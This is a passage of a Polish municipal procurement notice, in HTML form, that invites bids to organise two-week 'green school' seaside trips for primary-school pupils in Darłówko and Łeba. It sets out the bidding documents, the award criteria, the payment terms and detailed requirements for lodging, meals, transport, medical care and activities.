                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykaz usług wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane na formularzu zgodnym z treścią załącznika nr 5 do SIWZ, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy,
2)wykazu osób  Zamawiający uzna warunek za spełniony jeśli Wykonawca skieruje do realizacji zamówień dla każdego zadania osoby posiadające doświadczenie, na co najmniej 3 Zielonych szkołach w okresie ostatnich trzech lat na formularzu zgodnym z treścią załącznika nr 6 do SIWZ.
3)aktualny odpis z właściwego rejestru 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Formularz oferty.
2.Oświadczenie o niepodleganiu wykluczeniu z postępowania na formularzu zgodnym 
z treścią załącznika nr 2 do SIWZ.
3.Oświadczenie o spełnianiu warunków udziału w postępowaniu na formularzu zgodnym z treścią załącznika nr 3 do SIWZ.
4.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając wraz z ofertą zobowiązanie tych podmiotów 
do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.
5.Pełnomocnictwo złożone w formie oryginału lub notarialnie poświadczonej kopii w sytuacji:
1)Wykonawców wspólnie ubiegających się o udzielenie zamówienia - pełnomocnictwo 
do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.
2)podpisania oferty względnie innych dokumentów składanych wraz z ofertą przez osobę, dla której prawo do ich podpisania nie wynika z innych dokumentów złożonych wraz z ofertą  pełnomocnictwo do podpisania oferty.
6.W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenia, 
o których mowa w punkcie 2 i 3 składa każdy z Wykonawców wspólnie ubiegających się 
o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
7.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w punkcie 2 i 3.

B.Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej składane w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego informacji, o której mowa w art. 86 ust. 5 ustawy (Zbiorcze zestawienie ofert).

Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej (wzór oświadczenia znajduje się w załączniku nr 4 do SIWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, 
że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu 
o udzielenie zamówienia.
Zamawiający zamieści informacje, o których mowa w art. 86 ust. 5 ustawy w pliku o nazwie Zbiorcze zestawienie ofert na swojej stronie internetowej www.bip.um.rybnik.eu.  
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców  oświadczenie 
o przynależności braku przynależności do tej samej grupy kapitałowej, składa każdy 
z Wykonawców.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Należy podać informacje na temat udzielania zaliczek:
                  <br />a)I wpłata  płatna do 31.03.2017 r.  50% 
Zabezpieczeniem tej wpłaty będzie gwarancja bankowa Wykonawcy na podstawie Ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. z 2015 r. poz. 2164 ze zmianami, art. 151a ust 7).
b)II wpłata  pozostała kwota po uwzględnieniu zapłaty, o której mowa w ust. 1 - płatna do 4 dni po powrocie dzieci z wypoczynku, jeżeli zostaną spełnione wszystkie warunki zawarte w umowie.
Rozliczenie nastąpi według rzeczywistej liczby dzieci biorących udział w Zielonej Szkole.
</div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>Wycieczka do Centrum Nauki Eksperyment w Gdyni (cena biletu, przewodnik, dojazd) </td><td>20</td></tr><tr><td>Wycieczka do Ustki - Bunkry Baterii Bluchera (cena biletu, przewodnik, dojazd)</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/01/2017, godzina: 08:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zadanie 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	Przedmiotem zamówienia jest: zorganizowanie zielonej szkoły dla uczniów klas III SP 34

2)	Uczestnicy: 
	35 dzieci (2 klasy), z tym że ich ilość może ulec zmianie  (w takim przypadku Zamawiający płaci za rzeczywistą ilość uczestników),
	4 opiekunów (bezpłatny pobyt)
3)	Miejsce  realizacji:
Wykonawca będzie zobowiązany do zorganizowania zielonej szkoły w miejscowości Darłówko  

4)	Termin realizacji:

14 dni (13 noclegów)  między końcem maja 2017 a pierwszą połową czerwca 2017r.

5)	Zamawiający przewiduje zakres zamówienia zgodnie z przepisami określonymi w:
a)	Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz.U. z 1997r. Nr 12, poz 67 z późn. zm.).
b)	Rozporządzeniu Rady Ministrów z dnia 6 maja 1997r. w sprawie określania warunków w sprawie określania bezpieczeństwa osób przebywających w górach, kąpiących się, pływających i uprawiających sporty wodne (Dz.U.Nr 57, poz. 358).
c)	Ustawie z dnia 29 sierpnia 1997r. o usługach turystycznych (Dz.U z 2004 Nr 223, poz. 2268, z późn. zm.)

6)	Minimalne wymagania dotyczące obiektu wypoczynku:
Ogrodzony i bezpieczny dom wczasowy oddalony od plaży max 200 metrów, dostosowany dla osób niepełnosprawnych (dziecko na wózku).

7)	Wymagania dotyczące zakwaterowania:
a)	Wszystkie dzieci i wychowawcy rozmieszczeni w jednym budynku.
b)	Do dyspozycji uczestników powinny być pokoje: 2, 3 i 4  osobowe z pełnym węzłem sanitarnym (ubikacja, umywalka, prysznic), dla dziecka niepełnosprawnego i jego opiekuna pokój na parterze
c)	Wejście do budynku i do stołówki dostosowane dla dziecka na wózku
d)	W przypadku zmian pogodowych (znacznego obniżenia temperatury), Zamawiający zastrzega możliwość ogrzewania pomieszczeń centralnym ogrzewaniem, w których zakwaterowani będą uczestnicy bez naliczania dodatkowych kosztów.
e)	Oddzielne pokoje dla wychowawców.
f)	Stołówka w miejscu zakwaterowania.

8)	Wymagania dotyczące wyżywienia:
a)	Trzy posiłki dziennie - śniadanie, obiad i kolacja, -  dostosowane do potrzeb dzieci + podwieczorek podany do obiadu lub na wynos do rozdania przez wychowawcę.
b)	Wykonawca zapewni uczestnikom przez cały dzień nieograniczony dostęp do napojów (np. herbata, woda z sokiem).
c)	Napoje i suchy prowiant w trakcie całodniowych wycieczek oraz w drodze powrotnej do domu.
d)	Wykonawca zapewni obiad podany w porze kolacji w przypadku całodniowej wycieczki. 
e)	Wyżywienie będzie przygotowane w sposób zapewniający bezpieczeństwo żywności zgodnie z zasadami Hazard Analysis and Critiiicccal Control Points, zwanym "systemem HACCAP", a także Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. I z 2016r., poz. 1154). W przypadku stosowania przez niektórych uczestników diety, wykonawca zobowiązany jest zapewnić dania zgodnie z wytycznymi danej diety. 

9)	Transport:
a)	Autokar o podwyższonym standardzie klasy Lux (klimatyzacja, WC, ciepła herbata, video) w obie strony, dopuszczony do ruchu i odpowiadający wymaganiom ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz U z 2007r. Nr 125, poz.. 874 z późn. zm.), posiadający aktualny przegląd i ubezpieczenie, spełniający wszystkie wymogi bezpieczeństwa i kodeksu drogowego, obsługiwany przez dwóch wykwalifikowanych kierowców.
b)	Przejazd uczestników tylko w ciągu dnia.
c)	Zapewnienie wszystkim dzieciom i wychowawcom miejsca siedzącego w autokarze.

d)	Wykonawca zobowiązany jest ubezpieczyć dzieci i opiekunów od NNW w czasie podróży i w czasie pobytu na turnusie.
e)	Wykonawca przedstawi Zamawiającemu najpóźniej 7 dni przed rozpoczęciem Zielonej Szkoły kserokopię umowy ubezpieczenia.
f)	Wykonawca przed podpisaniem umowy przedstawi polisę ubezpieczeniową w oryginale oraz złoży kopię potwierdzoną za zgodność, lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę brutto złożonej oferty.

g)	Opieka medyczna.
a)	Wykonawca zobowiązany jest do zapewnienia odpowiedniej opieki medycznej zgodnie z obowiązującymi, w tym zakresie przepisami.
b)	Pielęgniarka z dyspozycyjnością 24h/dobę na terenie obiektu przez cały okres turnusu.
c)	Zapewnienie w koniecznych przypadkach opieki lekarskiej w ramach ubezpieczania zdrowotnego, polegającej na wezwaniu lekarza do Obiektu lub niezwłocznym dowiezieniu uczestnika zielonej szkoły do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem.
d)	Wykonawca zapewni zaopatrzenie ambulatorium obozowego w podstawowe leki i środki opatrunkowe.

h)	Zapewniona opieka rezydenta biura podróży przez cały okres pobytu dzieci.

i)	Zapewnienie przez organizatora opieki nocnej w budynku zakwaterowania:
Osoba/osoby pełniąca dyżur nocny w godzinach od 23.00 do 6.00  przez cały okres pobytu.

j)	Zarządzający obiektem zostanie pisemnie powiadomiony przed przyjazdem dzieci i wychowawców, jakie warunki mają być spełnione.

k)	W cenie oferty należy uwzględnić:
a)	świetlicę do zajęć, sala (pomieszczenie odrębne niż jadalnia), z możliwością prowadzenia zajęć edukacyjnych - z tablicą, kredą, stolikami.
b)	dostęp do materiałów plastycznych, jak papier i kredki,
c)	dostęp do placu zabaw z boiskami i sprzętu sportowego, np.: piłki, skakanki.


l)	Dodatkowe imprezy:
a)	Dyskoteki 4 do 5 razy (miejsce, sprzęt np. magnetofon) w terminach do uzgodnienia z wychowawcą,
b)	Ognisko z pieczeniem kiełbasek (minimum 2 razy)
c)	Dodatkowe zajęcia sportowe i specjalistyczne z animatorem

m)	W ramach programu Wykonawca zobowiązany jest do zorganizowania 2 wycieczek autokarowych z przewodnikiem:

a)	 Kołobrzeg:
- zwiedzanie miasta z przewodnikiem: Promenada, Pomnik Zaślubin z Morzem, Baszta Prochowa, Katedra, Latarnia Morska

b)	Darłowo:
- zwiedzanie portu, rejs statkiem po morzu.

Bilety wstępu i przewodnicy do proponowanych miejsc i obiektów mają być w cenie skierowania.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>63500000-4, 55240000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>ceba</td><td>60</td></tr><tr><td>Wycieczka do Centrum Nauki Eksperyment w Gdyni</td><td>20</td></tr><tr><td>Wycieczka do Ustki - Bunkry Baterii Bluchera </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zadanie 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2)	Przedmiotem zamówienia jest: zorganizowanie zielonej szkoły dla uczniów klas III SP 34

2 Uczestnicy:  
	58 dzieci (3 klasy), z tym że ich ilość może ulec zmianie  (w takim przypadku Zamawiający płaci za rzeczywistą ilość uczestników),
	6 opiekunów  bezpłatny pobyt wychowawców.

3 Miejsce  realizacji:
Wykonawca będzie zobowiązany do zorganizowania zielonej szkoły w miejscowości  Łeba.

4.	Termin realizacji:

14	ni (13 noclegów) w drugiej połowie maja 2017r.

5.Zamawiający przewiduje zakres zamówienia zgodnie z przepisami określonymi w:
a)	Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz.U. z 1997r. Nr 12, poz 67 z późn. zm.).
b)	Rozporządzeniu Rady Ministrów z dnia 6 maja 1997r. w sprawie określania warunków w sprawie określania bezpieczeństwa osób przebywających w górach, kąpiących się, pływających i uprawiających sporty wodne (Dz.U.Nr 57, poz. 358).
c)	Ustawie z dnia 29 sierpnia 1997r. o usługach turystycznych (Dz.U z 2004 Nr 223, poz. 2268, z późn. zm.)

6	Minimalne wymagania dotyczące obiektu wypoczynku:
Ogrodzony i bezpieczny dom wczasowy oddalony od morza max 300 metrów.

7	Wymagania dotyczące zakwaterowania:
a)	Wszystkie dzieci i wychowawcy rozmieszczeni w jednym budynku.
b)	Do dyspozycji uczestników powinny być pokoje: 2, 3, 4 i 5  osobowe z pełnym węzłem sanitarnym (ubikacja, umywalka, prysznic), lub typu studio (2+2+ łazienka)
c)	W przypadku zmian pogodowych (znacznego obniżenia temperatury), Zamawiający zastrzega możliwość ogrzewania pomieszczeń centralnym ogrzewaniem, w których zakwaterowani będą uczestnicy bez naliczania dodatkowych kosztów.
d)	Oddzielne pokoje dla wychowawców.

8 Wymagania dotyczące wyżywienia:
a)	Trzy posiłki dziennie  śniadanie (szwedzki stół), obiad i kolacja, -  dostosowane do potrzeb dzieci + podwieczorek podany do obiadu lub na wynos do rozdania przez wychowawcę. Posiłki maja być smaczne, urozmaicone.
b)	Wykonawca zapewni uczestnikom przez cały dzień nieograniczony dostęp do napojów (np. herbata, woda z sokiem).
c)	Napoje i suchy prowiant w trakcie całodniowych wycieczek oraz w drodze powrotnej do domu.
d)	Wykonawca zapewni obiad podany w porze kolacji w przypadku całodniowej wycieczki. 
e)	Wyżywienie będzie przygotowane w sposób zapewniający bezpieczeństwo żywności zgodnie z zasadami Hazard Analysis and Critiiicccal Control Points, zwanym "systemem HACCAP", a także Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. I z 2016r., poz. 1154). W przypadku stosowania przez niektórych uczestników diety, wykonawca zobowiązany jest zapewnić dania zgodnie z wytycznymi danej diety. 

9 Transport:
a)	Autokar o podwyższonym standardzie klasy Lux (klimatyzacja, WC, ciepła herbata, video) w obie strony, dopuszczony do ruchu i odpowiadający wymaganiom ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz U z 2007r. Nr 125, poz.. 874 z późn. zm.), posiadający aktualny przegląd i ubezpieczenie, spełniający wszystkie wymogi bezpieczeństwa i kodeksu drogowego, obsługiwany przez dwóch wykwalifikowanych kierowców.
b)	Przejazd uczestników tylko w ciągu dnia.
c)	Zapewnienie wszystkim dzieciom i wychowawcom miejsca siedzącego w autokarze.

d)	Wykonawca zobowiązany jest ubezpieczyć dzieci i opiekunów od NNW w czasie podróży i w czasie pobytu na turnusie.
e)	Wykonawca przedstawi Zamawiającemu najpóźniej 7 dni przed rozpoczęciem Zielonej Szkoły kserokopię umowy ubezpieczenia.
f)	Wykonawca przed podpisaniem umowy przedstawi polisę ubezpieczeniową w oryginale oraz złoży kopię potwierdzoną za zgodność, lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę brutto złożonej oferty.

10 Opieka medyczna.
e)	Wykonawca zobowiązany jest do zapewnienia odpowiedniej opieki medycznej zgodnie z obowiązującymi, w tym zakresie przepisami.
f)	Pielęgniarka z dyspozycyjnością 24h/dobę na terenie obiektu przez cały okres turnusu.
g)	Zapewnienie w koniecznych przypadkach opieki lekarskiej w ramach ubezpieczania zdrowotnego, polegającej na wezwaniu lekarza do Obiektu lub niezwłocznym dowiezieniu uczestnika zielonej szkoły do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem.
h)	Wykonawca zapewni zaopatrzenie ambulatorium obozowego w podstawowe leki i środki opatrunkowe. Lekarstwa wg recept w kwocie skierowania (od witamin po antybiotyki).
i)	Wykonawca zobowiązuje się do konsultacji telefonicznej z rodzicem/opiekunem w przypadkach nagłej konieczności podania uczestnikowi zielonej szkoły odpowiednich leków.

11	Zapewniona opieka rezydenta biura podróży przez cały okres pobytu dzieci.

12	Zapewnienie przez organizatora opieki nocnej w budynku zakwaterowania:
Osoba/osoby pełniąca dyżur nocny w godzinach od 23.00 do 6.00-przez cały okres pobytu.

13	Do dyspozycji grupy cenę oferty należy uwzględnić:
a)	salę dydaktyczną wyposażoną audiowizualnie, salę do zajęć dydaktycznych-świetlica
b)	 dostęp do materiałów plastycznych, jak papier i kredki,
c)	dostęp do placu zabaw, boisk do piłki nożnej i siatkówki i sprzętu sportowego

14	Dodatkowe imprezy:
a)	Dyskoteki 2-3 (miejsce, sprzęt np. magnetofon) w terminach do uzgodnienia z wychowawcą.
b)	Ognisko z pieczeniem kiełbasek
c)	Chrzest morski
d)	Animacje kulturalno-oświatowe (zajęcia plastyczne, karaoke, chusta animacyjna),
